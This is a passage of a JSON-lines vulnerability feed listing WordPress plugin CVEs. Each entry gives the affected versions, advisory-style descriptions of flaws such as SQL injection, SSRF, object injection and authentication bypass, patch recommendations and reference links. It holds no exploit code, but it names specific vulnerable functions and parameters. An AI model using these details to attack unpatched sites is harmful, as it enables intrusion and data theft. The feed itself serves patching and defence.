ordpress-simple-paypal-shopping-cart\\\/trunk\\\/includes\\\/wpsc-shortcodes-related.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210506\\\/wordpress-simple-paypal-shopping-cart\\\/trunk\\\/includes\\\/wpsc-shortcodes-related.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adfba556-6a96-4836-af0f-39c214099481?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adfba556-6a96-4836-af0f-39c214099481?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4135","slug":"wp-latest-posts","versionImpact":"5.0.7","versionEndExcluding":"5.0.8","description":"The WP Latest Posts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.0.7. This is due to the plugin allowing users to execute an action that does not properly validate a user-supplied value prior to using that value in a call to do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57d90ba7-b655-4655-981c-548ff96c3bb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57d90ba7-b655-4655-981c-548ff96c3bb7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081119\\\/wp-latest-posts\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081119\\\/wp-latest-posts\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8432","slug":"webba-booking-lite","versionImpact":"5.0.48","versionEndExcluding":"5.0.50","description":"The Appointment & Event Booking Calendar Plugin \u2013 Webba Booking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_appearance() function in all versions up to, and including, 5.0.48. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the booking form's CSS.","recommendation":"Update to version 5.0.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b33b77-2e72-4959-bdce-646e968f2a73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b33b77-2e72-4959-bdce-646e968f2a73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webba-booking-lite\\\/tags\\\/5.0.48\\\/includes\\\/class-wbk-request-manager.php#L1986\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webba-booking-lite\\\/tags\\\/5.0.48\\\/includes\\\/class-wbk-request-manager.php#L1986\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152926\\\/webba-booking-lite\\\/trunk\\\/includes\\\/class-wbk-request-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152926\\\/webba-booking-lite\\\/trunk\\\/includes\\\/class-wbk-request-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5449","slug":"wp-dark-mode","versionImpact":"5.0.4","versionEndExcluding":"5.0.5","description":"The WP Dark Mode \u2013 WordPress Dark Mode Plugin for Improved Accessibility, Dark Theme, Night Mode, and Social Sharing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpdm_social_share_save_options function in all versions up to, and including, 5.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"Update to version 5.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7d20733-d61b-4b2f-8597-528644f0bc26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7d20733-d61b-4b2f-8597-528644f0bc26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dark-mode\\\/trunk\\\/includes\\\/modules\\\/social-share\\\/class-social-share.php#L581\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dark-mode\\\/trunk\\\/includes\\\/modules\\\/social-share\\\/class-social-share.php#L581\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096290\\\/wp-dark-mode\\\/trunk?contextall=1&old=3073245&old_path=%2Fwp-dark-mode%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096290\\\/wp-dark-mode\\\/trunk?contextall=1&old=3073245&old_path=%2Fwp-dark-mode%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6559","slug":"mw-wp-form","versionEndExcluding":"5.0.4","description":"The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d555c-9bbd-42f5-8020-ccfc18755a79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d555c-9bbd-42f5-8020-ccfc18755a79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007879\\\/mw-wp-form\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007879\\\/mw-wp-form\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3238","slug":"superfly-menu","versionImpact":"5.0.29","versionEndExcluding":"5.0.30","description":"The WordPress Menu Plugin \u2014 Superfly Responsive Menu plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.29. This is due to missing or incorrect nonce validation on the ajax_handle_delete_icons() function. This makes it possible for unauthenticated attackers to delete arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please not the CSRF was patched in 5.0.28, however, adequate directory traversal protection wasn't introduced until 5.0.30.","recommendation":"Update to version 5.0.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3608fce3-0869-4516-ae08-68108f733c37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3608fce3-0869-4516-ae08-68108f733c37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/superfly-responsive-wordpress-menu-plugin\\\/8012790\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/superfly-responsive-wordpress-menu-plugin\\\/8012790\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3225","slug":"float-menu","versionEndExcluding":"5.0.3","description":"The Float menu WordPress plugin before 5.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c76d0f4-2ea8-433d-afb2-e35e45630899\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c76d0f4-2ea8-433d-afb2-e35e45630899\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12505","slug":"trackserver","versionImpact":"5.0.2","versionEndExcluding":"5.0.3","description":"The Trackserver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tsmap' shortcode in all versions up to, and including, 5.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219730%40trackserver&new=3219730%40trackserver&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219730%40trackserver&new=3219730%40trackserver&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ade911-f9e7-4b1c-87c8-78e7664feff7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ade911-f9e7-4b1c-87c8-78e7664feff7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5348","slug":"woocommerce-catalog-enquiry","versionImpact":"5.0.2","versionEndExcluding":"5.0.3","description":"The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.","recommendation":"Update to version 5.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b37b09c1-1b53-471c-9b10-7d2d05ae11f1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b37b09c1-1b53-471c-9b10-7d2d05ae11f1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34001","slug":"hide-my-wp","versionImpact":"5.0.25","versionEndExcluding":"5.0.26","description":"Improper Restriction of Excessive Authentication Attempts vulnerability in WPPlugins \u2013 WordPress Security Plugins Hide My WP Ghost allows Functionality Bypass.This issue affects Hide My WP Ghost: from n\/a through 5.0.25.","recommendation":"Update to version 5.0.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hide-my-wp\\\/wordpress-hide-my-wp-ghost-security-plugin-plugin-5-0-24-captcha-bypass-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hide-my-wp\\\/wordpress-hide-my-wp-ghost-security-plugin-plugin-5-0-24-captcha-bypass-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13473","slug":"ltl-freight-quotes-worldwide-express-edition","versionImpact":"5.0.20","versionEndExcluding":"5.0.21","description":"The LTL Freight Quotes \u2013 Worldwide Express Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameter in all versions up to, and including, 5.0.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.0.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L387\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L387\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215844%40ltl-freight-quotes-worldwide-express-edition&new=3215844%40ltl-freight-quotes-worldwide-express-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215844%40ltl-freight-quotes-worldwide-express-edition&new=3215844%40ltl-freight-quotes-worldwide-express-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e72828e-a6f6-43fc-8a10-d9908004c0fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e72828e-a6f6-43fc-8a10-d9908004c0fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4537","slug":"hide-my-wp","versionImpact":"5.0.18","versionEndExcluding":"5.0.20","description":"The Hide My WP Ghost \u2013 Security Plugin plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 5.0.18. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address from logging in.","recommendation":"Update to version 5.0.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.0.18\\\/models\\\/Brute.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.0.18\\\/models\\\/Brute.php#L131\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf89f94-587a-4fed-a6e4-3876b7dbc9ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf89f94-587a-4fed-a6e4-3876b7dbc9ba?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/trunk\\\/models\\\/Brute.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/trunk\\\/models\\\/Brute.php#L132\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2320","slug":"cf7-google-sheets-connector","versionImpact":"5.0.1","versionEndExcluding":"5.0.2","description":"The CF7 Google Sheets Connector WordPress plugin before 5.0.2, cf7-google-sheets-connector-pro WordPress plugin through 5.0.2 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f17ccbaa-2fcd-4f17-a4da-73f2bc8a4fe9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f17ccbaa-2fcd-4f17-a4da-73f2bc8a4fe9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"float-menu","versionEndExcluding":"5.0.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7444","slug":"loginpress-pro","versionImpact":"5.0.1","versionEndExcluding":"5.0.2","description":"The LoginPress Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.0.1. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 5.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/loginpress.pro\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/loginpress.pro\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcb3af-0b27-4442-aca0-58626b68f0d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcb3af-0b27-4442-aca0-58626b68f0d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6316","slug":"mw-wp-form","versionImpact":"5.0.1","versionEndExcluding":"5.0.2","description":"The MW WP Form plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the '_single_file_upload' function in versions up to, and including, 5.0.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2c03142-be30-4173-a140-14d73a16dd2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2c03142-be30-4173-a140-14d73a16dd2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mw-wp-form\\\/tags\\\/5.0.1\\\/classes\\\/models\\\/class.file.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mw-wp-form\\\/tags\\\/5.0.1\\\/classes\\\/models\\\/class.file.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003065\\\/mw-wp-form#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003065\\\/mw-wp-form#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2940","slug":"ninja-tables","versionImpact":"5.0.18","versionEndExcluding":"5.0.19","description":"The Ninja Tables \u2013 Easy Data Table Builder plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.18 via the args[url] parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 5.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L268\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3269692%40ninja-tables&new=3269692%40ninja-tables&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3269692%40ninja-tables&new=3269692%40ninja-tables&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02480559-be5c-4d23-9e62-bb76fafb4f42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02480559-be5c-4d23-9e62-bb76fafb4f42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2939","slug":"ninja-tables","versionImpact":"5.0.18","versionEndExcluding":"5.0.19","description":"The Ninja Tables \u2013 Easy Data Table Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.0.18 via deserialization of untrusted input from the args[callback] parameter . This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute arbitrary functions, though it does not allow user supplied parameters only single functions can be called so the impact is limited.","recommendation":"Update to version 5.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.18\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/tags\\\/5.0.19\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ninja-tables\\\/trunk\\\/vendor\\\/wpfluent\\\/framework\\\/src\\\/WPFluent\\\/Http\\\/Client.php#L399\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e38553d-5dba-4c84-95f7-43420245c770?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e38553d-5dba-4c84-95f7-43420245c770?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12772","slug":"ninja-tables","versionImpact":"5.0.16","versionEndExcluding":"5.0.17","description":"The Ninja Tables  WordPress plugin before 5.0.17 does not sanitize and escape a parameter before outputting it back in the page when importing a CSV, leading to a Cross Site Scripting vulnerability.","recommendation":"Update to version 5.0.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b6d0f95-6632-4079-8c1b-517a8d02c330\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b6d0f95-6632-4079-8c1b-517a8d02c330\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10399","slug":"download-monitor","versionImpact":"5.0.13","versionEndExcluding":"5.0.14","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_search_users function in all versions up to, and including, 5.0.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain usernames and emails of site users.","recommendation":"Update to version 5.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b88862-012a-4dc6-9abb-99dc0d9408fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b88862-012a-4dc6-9abb-99dc0d9408fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.13\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-monitor\\\/tags\\\/5.0.13\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178099\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178099\\\/download-monitor\\\/trunk\\\/src\\\/KeyGeneration\\\/class-dlm-key-generation.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25217","slug":"sg-cachepress","versionEndExcluding":"5.0.13","description":"The SiteGround Optimizer plugin for WordPress is vulnerable to authorization bypass leading to Remote Code Execution and Local File Inclusion in versions up to, and including, 5.0.12 due to incorrect use of an access control attribute on the switch_php function called via the \/switch-php REST API route. This allows attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657f3bd7-2cdc-4eb6-ba50-7c7fca468df0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/657f3bd7-2cdc-4eb6-ba50-7c7fca468df0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/03\\\/vulnerability-disclosure-siteground-optimizer-caldera-forms.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2019\\\/03\\\/vulnerability-disclosure-siteground-optimizer-caldera-forms.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8943","slug":"latepoint","versionImpact":"5.0.12","versionEndExcluding":"5.0.13","description":"The LatePoint plugin for WordPress is vulnerable to authentication bypass in versions up to, and including,  5.0.12. This is due to insufficient verification on the user being supplied during the booking customer step. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. Note that logging in as a WordPress user is only possible if the \"Use WordPress users as customers\" setting is enabled, which is disabled by default. The vulnerability is partially patched in version 5.0.12 and fully patched in version 5.0.13.","recommendation":"Update to version 5.0.13, or a newer patched 